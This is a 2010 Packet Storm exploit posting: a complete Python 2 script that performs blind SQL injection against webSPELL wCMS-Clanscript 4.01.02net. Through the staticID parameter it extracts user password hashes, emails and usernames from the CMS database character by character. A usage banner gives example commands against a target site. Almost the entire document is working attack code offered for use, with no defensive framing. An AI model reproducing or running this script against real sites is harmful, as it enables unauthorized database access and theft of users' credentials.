webSPELL wCMS-Clanscript 4.01.02net Blind SQL Injection

2010-09-29T00:00:00
ID PACKETSTORM:94332
Type packetstorm
Reporter Easy Laster
Modified 2010-09-29T00:00:00

Description

                                        
                                            `#----------------------------Information------------------------------------------------  
#+Autor : Easy Laster  
#+ICQ : 11-051-551  
#+Date : 29.09.2010  
#+Script : Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection Exploit  
#+Price : $00,00  
#+Language :PHP  
#+Discovered by Easy Laster  
#+code by Dr.ChAoS  
#+Security Group Undergroundagents,Free-hack and 4004-Security-Project  
#+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,  
#Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,  
#N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco,  
#and all member from free-hack.com.  
#---------------------------------------------------------------------------------------  
#!/usr/bin/env python  
#-*- coding:utf-8 -*-  
import sys, urllib2, getopt  
  
def out(str):  
sys.stdout.write(str)  
sys.stdout.flush()  
  
def read_url(url):  
while True:  
try:  
src = urllib2.urlopen(url).read()  
break  
except:  
pass  
return src  
  
class Exploit:  
charset = "0123456789abcdefABCDEF"  
url = ""  
charn = 1  
id = 1  
table_prefix = "webs_"  
table_field = ""  
passwd = ""  
columns = []  
find_passwd = True  
  
def __init__(self):  
if len(sys.argv) < 2:  
print "*****************************************************************************"  
print "*Webspell wCMS-Clanscript4.01.02net static&static Blind SQL Injection Exploit*"  
print "*****************************************************************************"  
print "* Discovered and vulnerability by Easy Laster *"  
print "* coded by Dr.ChAoS *"  
print "*****************************************************************************"  
print "* Usage: *"  
print "* python exploit.py [OPTION...] [SWITCH...] <url> *"  
print "* *"  
print "* Example: *"  
print "* *"  
print "* Get the password of the user with id 2: *"  
print "* python exploit.py --id 2 http://site.de/path/ *"  
print "* *"  
print "* Get email, username and password of id 1: *"  
print "* python exploit.py --columns 80:1:email,25:5:username http://site.de/ *"  
print "* *"  
print "* Switches: *"  
print "* --nopw Search no password *"  
print "* *"  
print "* Options: *"  
print "* --id <user id> User id *"  
print "* --prefix <table prefix> Table prefix of ECP *"  
print "* --charn <1 - 32, default = 1> Start at position x *"  
print "* --columns <max_chars:charn:column,...> Get value of any column you want *"  
print "*****************************************************************************"  
exit()  
opts, switches = getopt.getopt(sys.argv[1:], "", ["id=", "prefix=", "charn=", "columns=", "nopw"])  
for opt in opts:  
if opt[0] == "--id":  
self.id = int(opt[1])  
elif opt[0] == "--prefix":  
self.table_prefix = opt[1]  
elif opt[0] == "--charn":  
self.charn = int(opt[1])  
elif opt[0] == "--columns":  
for col in opt[1].split(","):  
max, charx, name = col.split(":")  
self.columns.append([int(max), int(charx), name, ""])  
elif opt[0] == "--nopw":  
self.find_passwd = False  
for switch in switches:  
if switch[:4] == "http":  
if switch[-1:] == "/":  
self.url = switch  
else:  
self.url = switch + "/"  
def valid_page(self, src):  
if "http://www.wookie.de/images/baustelle.gif" not in src:  
return True  
else:  
return False  
def generate_url(self, ascii):  
return self.url + "index.php?site=static&staticID=1%27+and+ascii(substring((SELECT%20" + self.table_field + "%20FROM%20" + self.table_prefix + "user+WHERE+userid=" + str(self.id) + ")," + str(self.charn) + ",1))%3E" + str(ord(ascii)) + "--+"  
def start(self):  
print "Exploiting..."  
if self.find_passwd:  
charx = self.charn  
self.password()  
if len(self.columns) > 0:  
self.read_columns()  
print "All finished!\n"  
print "------ Results ------"  
if len(self.columns) > 0:  
for v in self.columns:  
print "Column \"" + v[2] + "\": " + v[3]  
if self.find_passwd:  
if len(self.passwd) == 32 - charx + 1:  
print "Password: " + self.passwd  
else:  
print "Password not found!"  
print "---------------------"  
def read_columns(self):  
end = False  
charrange = [0]  
charrange.extend(range(32, 256))  
for i in range(len(self.columns)):  
out("Getting value of \"" + self.columns[i][2] + "\": ")  
self.table_field = self.columns[i][2]  
self.charn = self.columns[i][1]  
for pwc in range(self.charn, self.columns[i][0] + 1):  
if end == True:  
break  
self.charn = pwc  
end = False  
for c in charrange:  
src = read_url(self.generate_url(chr(c)))  
if self.valid_page(src):  
if c == 0:  
end = True  
else:  
self.columns[i][3] += chr(c)  
out(chr(c))  
break  
out("\n")  
def password(self):  
out("Getting password: ")  
self.table_field = "password"  
for pwc in range(self.charn, 33):  
self.charn = pwc  
for c in self.charset:  
src = read_url(self.generate_url(c))  
if self.valid_page(src):  
self.passwd += c  
out(c)  
break  
out("\n")  
  
exploit = Exploit()  
exploit.start()  
  
`